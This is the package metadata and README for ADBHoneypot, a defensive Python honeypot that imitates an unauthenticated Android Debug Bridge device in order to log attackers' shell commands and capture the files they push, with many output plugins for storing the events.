Metadata-Version: 2.4
Name: adbhoneypot
Version: 3.0.2
Summary: An ADB Honeypot
Home-page: https://gitlab.com/bontchev/adbhoneypot
Author: Vesselin Bontchev
Author-email: vbontchev@yahoo.com
License: GPL-3.0-only
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: Science/Research
Classifier: Intended Audience :: System Administrators
Classifier: Operating System :: Microsoft :: Windows
Classifier: Operating System :: POSIX :: Linux
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.6
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Programming Language :: Python :: 3.14
Classifier: Topic :: Security
Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: configparser>=3.5.0
Requires-Dist: geoip2>=2.7.0
Requires-Dist: ipaddress; python_version < "3"
Requires-Dist: maxminddb>=1.3.0
Requires-Dist: pytz
Requires-Dist: requests<=2.27.1; python_version < "3"
Requires-Dist: requests; python_version >= "3"
Requires-Dist: service_identity<=18.1.0; python_version < "3"
Requires-Dist: service_identity; python_version >= "3"
Requires-Dist: twisted<21,>=20.3.0; python_version < "3"
Requires-Dist: twisted>=21; python_version >= "3"
Provides-Extra: couchdb
Requires-Dist: couchdb; extra == "couchdb"
Provides-Extra: datadog
Requires-Dist: certifi; extra == "datadog"
Requires-Dist: cryptography<=2.8; python_version < "3" and extra == "datadog"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "datadog"
Requires-Dist: cryptography; python_version >= "3" and extra == "datadog"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "datadog"
Provides-Extra: discord
Requires-Dist: certifi; extra == "discord"
Provides-Extra: elastic
Requires-Dist: elasticsearch<=7.13; python_version < "3" and extra == "elastic"
Requires-Dist: numpy<=1.16.6; python_version < "3" and extra == "elastic"
Requires-Dist: elasticsearch8<9.0.0,>=8.12.0; python_version >= "3" and extra == "elastic"
Requires-Dist: numpy; python_version >= "3" and extra == "elastic"
Provides-Extra: hpfeed
Requires-Dist: Automat<20; python_version < "3" and extra == "hpfeed"
Requires-Dist: hpfeeds>=3.0.0; extra == "hpfeed"
Provides-Extra: influx2
Requires-Dist: influxdb-client; python_version >= "3" and extra == "influx2"
Provides-Extra: jsonlog
Provides-Extra: kafka
Requires-Dist: confluent-kafka<1.0; python_version < "3" and extra == "kafka"
Requires-Dist: confluent-kafka; python_version >= "3" and extra == "kafka"
Provides-Extra: localsyslog
Provides-Extra: mongodb
Requires-Dist: pymongo<=3.13.0; python_version < "3" and extra == "mongodb"
Requires-Dist: dnspython; python_version < "3" and extra == "mongodb"
Requires-Dist: pymongo; python_version >= "3" and extra == "mongodb"
Provides-Extra: mysql
Requires-Dist: PyMySQL; python_version < "3" and extra == "mysql"
Requires-Dist: mysqlclient>=1.3.12; python_version >= "3" and extra == "mysql"
Provides-Extra: nlcvapi
Requires-Dist: certifi; extra == "nlcvapi"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "nlcvapi"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "nlcvapi"
Provides-Extra: postgres
Requires-Dist: psycopg2-binary; extra == "postgres"
Provides-Extra: redisdb
Requires-Dist: redis<=3.5.3; python_version < "3" and extra == "redisdb"
Requires-Dist: redis; python_version >= "3" and extra == "redisdb"
Provides-Extra: rethinkdblog
Requires-Dist: rethinkdb>=2.4; extra == "rethinkdblog"
Requires-Dist: looseversion; extra == "rethinkdblog"
Provides-Extra: slack
Requires-Dist: slackclient<3; python_version < "3" and extra == "slack"
Requires-Dist: slack-sdk; python_version >= "3" and extra == "slack"
Provides-Extra: socketlog
Provides-Extra: sqlite
Provides-Extra: telegram
Requires-Dist: certifi; extra == "telegram"
Provides-Extra: textlog
Provides-Extra: xmpp
Requires-Dist: xmpppy>=0.7.3; extra == "xmpp"
Provides-Extra: all
Requires-Dist: Automat<20; python_version < "3" and extra == "all"
Requires-Dist: PyMySQL; python_version < "3" and extra == "all"
Requires-Dist: certifi; extra == "all"
Requires-Dist: confluent-kafka; python_version >= "3" and extra == "all"
Requires-Dist: confluent-kafka<1.0; python_version < "3" and extra == "all"
Requires-Dist: couchdb; extra == "all"
Requires-Dist: cryptography; python_version >= "3" and extra == "all"
Requires-Dist: cryptography<=2.8; python_version < "3" and extra == "all"
Requires-Dist: dnspython; python_version < "3" and extra == "all"
Requires-Dist: elasticsearch8<9.0.0,>=8.12.0; python_version >= "3" and extra == "all"
Requires-Dist: elasticsearch<=7.13; python_version < "3" and extra == "all"
Requires-Dist: hpfeeds>=3.0.0; extra == "all"
Requires-Dist: influxdb-client; python_version >= "3" and extra == "all"
Requires-Dist: looseversion; extra == "all"
Requires-Dist: mysqlclient>=1.3.12; python_version >= "3" and extra == "all"
Requires-Dist: numpy; python_version >= "3" and extra == "all"
Requires-Dist: numpy<=1.16.6; python_version < "3" and extra == "all"
Requires-Dist: psycopg2-binary; extra == "all"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "all"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "all"
Requires-Dist: pymongo; python_version >= "3" and extra == "all"
Requires-Dist: pymongo<=3.13.0; python_version < "3" and extra == "all"
Requires-Dist: redis; python_version >= "3" and extra == "all"
Requires-Dist: redis<=3.5.3; python_version < "3" and extra == "all"
Requires-Dist: rethinkdb>=2.4; extra == "all"
Requires-Dist: slack-sdk; python_version >= "3" and extra == "all"
Requires-Dist: slackclient<3; python_version < "3" and extra == "all"
Requires-Dist: xmpppy>=0.7.3; extra == "all"
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: license
Dynamic: license-file
Dynamic: provides-extra
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary

# ADBHoneypot: an Android Debug Bridge Honeypot

ADBHoneypot is a honeypot simulating an Android device accessible via the
[Android Debug Bridge](https://developer.android.com/studio/command-line/adb)
(ADB) protocol over TCP. It is a complete rewrite of the original
[ADBHoney](https://github.com/huuck/ADBHoney) project, built on the
[Twisted](https://twistedmatrix.com) event-driven networking framework.

The honeypot records all incoming ADB connections, captures shell commands
issued by attackers, and saves any files they attempt to push to the fake
device. It supports a rich set of output plugins for storing and forwarding
events to a variety of backends.

## ADB (Android Debug Bridge)

ADB (Android Debug Bridge) and its protocol is what a computer uses to
communicate with Android devices (like phones and TVs). The protocol itself is
an application layer protocol, which can be on the top of TCP or USB. ADB
implements various control commands (e.g. "adb shell", "adb pull", etc.) for the
benefit of clients (like command-line users). These commands are called
'services' in ADB. ADB usually communicates with the device over USB, but it is
also possible to use ADB over Wi-Fi after some initial setup over USB. The
device can be set to listen for a TCP/IP connection on port 5555 by issuing the
command `adb tcpip 5555`. Devices that do not support authentication can be
accessed and attacked remotely, allowing the attacker to take full control of
the device by using combination of the following commands.

For now the honeypot accepts:

* `adb connect host[:port]` - Connect to a device over TCP/IP. If you do not
  specify a port, 5555 is used by default.

* `adb disconnect [host | host:port]` - Disconnect from the specified TCP/IP
  device running on the specified port. If you do not specify a host or a port,
  then all devices are disconnected from all TCP/IP ports. If you specify a
  host, but not a port, the default port 5555 is used.

* `adb shell command` - Issue a shell command in the target device and then exit
  the remote shell.

* `adb push local_filepath remote_fiepath` - Copy files and directories from the
  local device (computer) to a remote location on the device.

## Features

* Full Twisted-based async I/O, scales to many simultaneous connections.
* Captures shell commands, file pushes, and wget/curl download attempts.
* Saves uploaded files to disk, named by their SHA-256 hash.
* Optionally downloads files referenced in wget/curl commands.
* Configurable fake device identity string (model, features, etc.).
* Works on Linux and Windows, with Python 2.7 and Python 3.6+.
* Rich set of output plugins.
* `adbhoneypot` CLI command for init/run/start/stop/restart/status.
* Installable from PyPI.

## Prerequisites

* Python 2.7 or Python 3.6+
* A working database server (only if you use a database output plugin)

## Usage

Check the [Linux installation guide](https://gitlab.com/bontchev/adbhoneypot/-/blob/master/adbhoneypot/data/docs/INSTALL.md) or the
[Windows installation guide](https://gitlab.com/bontchev/adbhoneypot/-/blob/master/adbhoneypot/data/docs/INSTALLWIN.md) for complete
instructions on how to install, configure, and run the honeypot.

## Links

Android Open Source Project - [ADB Overview](https://github.com/aosp-mirror/platform_system_core/blob/master/adb/OVERVIEW.TXT)

Android Developer - [ADB Documentation](https://developer.android.com/studio/command-line/adb)

Reverse-engeenered documentation - [ADB Protocol](https://github.com/cstyan/adbDocumentation#adb-protocol-documentation)

Geir Sporsheim - [protocol.py](https://github.com/sporsh/twisted-adb/blob/master/adb/protocol.py)
